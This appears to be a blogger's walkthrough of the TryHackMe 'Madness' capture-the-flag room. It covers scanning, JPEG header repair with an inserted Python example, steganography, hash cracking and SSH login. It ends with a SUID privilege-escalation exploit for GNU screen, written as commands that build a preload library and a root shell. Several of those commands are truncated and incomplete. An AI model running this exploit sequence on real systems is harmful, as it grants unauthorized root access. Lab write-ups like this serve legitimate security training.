TryHackMe: Madness

Today we will take a look at TryHackMe: Madness. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

Network scan

Command: sudo nmap -sS -sC -sV -oN nmap/initial

Let’s check the site

As you can see, there is a picture icon above. Let’s click on it.

There is no picture. Let’s download it and make some changes.

Command: wget

The .jpg file is corrupted. Let’s fix it.

Command: hexeditor thm.jpg
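Before reaching for a hex editor it helps to check what the leading bytes of the file actually say. The following is an added example, not code from the original writeup; it compares a file's magic bytes with what its extension promises and, on the assumption (the page does not say what was damaged) that only the first 8 bytes of a JFIF header were overwritten, restores them. The sample bytes are constructed for the demonstration.

```python
# Added example for this step; not part of the original writeup.
# Assumption (the page does not say what was damaged): the corruption is confined
# to the first 8 bytes, e.g. another format's signature pasted over the JPEG/JFIF
# header, and the rest of the file is intact.

SIGNATURES = {
    "jpeg": b"\xff\xd8\xff",          # SOI marker + start of the next marker
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}
EXT_TO_FORMAT = {"jpg": "jpeg", "jpeg": "jpeg", "png": "png", "gif": "gif"}

# Standard JFIF prefix: SOI, APP0 marker, APP0 length 16, then "JFIF\0".
JFIF_PREFIX = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"


def detect_format(data: bytes):
    """Return the format implied by the leading magic bytes, or None."""
    for name, magic in SIGNATURES.items():
        if data.startswith(magic):
            return name
    return None


def header_mismatch(filename: str, data: bytes):
    """Return (expected_from_extension, actual_from_magic, mismatch?)."""
    ext = filename.rsplit(".", 1)[-1].lower()
    expected = EXT_TO_FORMAT.get(ext)
    actual = detect_format(data)
    return expected, actual, expected != actual


def repair_jfif_header(data: bytes) -> bytes:
    """Restore the first 8 bytes of a JFIF file whose signature was overwritten.

    Sanity checks first: the tail of the APP0 identifier ("IF\\0", bytes 8-10)
    must still be present and the file must end with the EOI marker FF D9;
    otherwise the damage is elsewhere and we refuse to guess.
    """
    if data.startswith(SIGNATURES["jpeg"]):
        return data                     # header already intact
    if data[8:11] != b"IF\x00" or not data.endswith(b"\xff\xd9"):
        raise ValueError("damage is not limited to the 8-byte signature; inspect by hand")
    return JFIF_PREFIX[:8] + data[8:]


# Constructed sample: a structurally valid JFIF header plus EOI (not a real picture),
# and a copy whose first 8 bytes were overwritten with the PNG signature.
GOOD_SAMPLE = JFIF_PREFIX + b"\x01\x01\x00\x00\x01\x00\x01\x00\x00" + b"\xff\xd9"
DAMAGED_SAMPLE = SIGNATURES["png"] + GOOD_SAMPLE[8:]

if __name__ == "__main__":
    print(header_mismatch("thm.jpg", DAMAGED_SAMPLE))          # ('jpeg', 'png', True)
    print(detect_format(repair_jfif_header(DAMAGED_SAMPLE)))   # jpeg
```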

Now let’s try again.

We are provided with a hidden directory.

I was just checking and came across something like this.

There was another hint in the source code.

Open Burp Suite and check them one by one.

And that’s it. We got different results.

When we look at the site, we get this result.

Maybe the image we downloaded is needed again, because this is the steganography code.

Command: steghide info thm.jpg

Command: steghide --extract -sf thm.jpg

Let’s try to crack the hash we got.

I tried to access the information we have with ssh, but it didn’t work. After a while, I remembered that it was in the form of supplements. Let’s check.

We found the password, let’s log in.

Privilege Escalation

Command: find / -perm -u=s 2>/dev/null

We see something different. Let’s check the exploit.

I created the files in my terminal and transferred them to the target terminal.

And I entered the commands.

Command: gcc -fPIC -shared -ldl -o /tmp/ /tmp/libhax.c

Command: gcc -o /tmp/rootshell /tmp/rootshell.c

Command: echo "[+] Now we create our /etc/ file…"

Command: cd /etc

Command: umask 000

Command: screen -D -m -L echo -ne "\x0a/tmp/"

Command: echo "[+] Triggering…"

Command: screen -ls

Command: /tmp/rootshell

And now we are root.

“If you have any questions or comments, please do not hesitate to write. Have a good day.”




Hello, my name is Elman. I am from Azerbaijan. I wish you a good day.
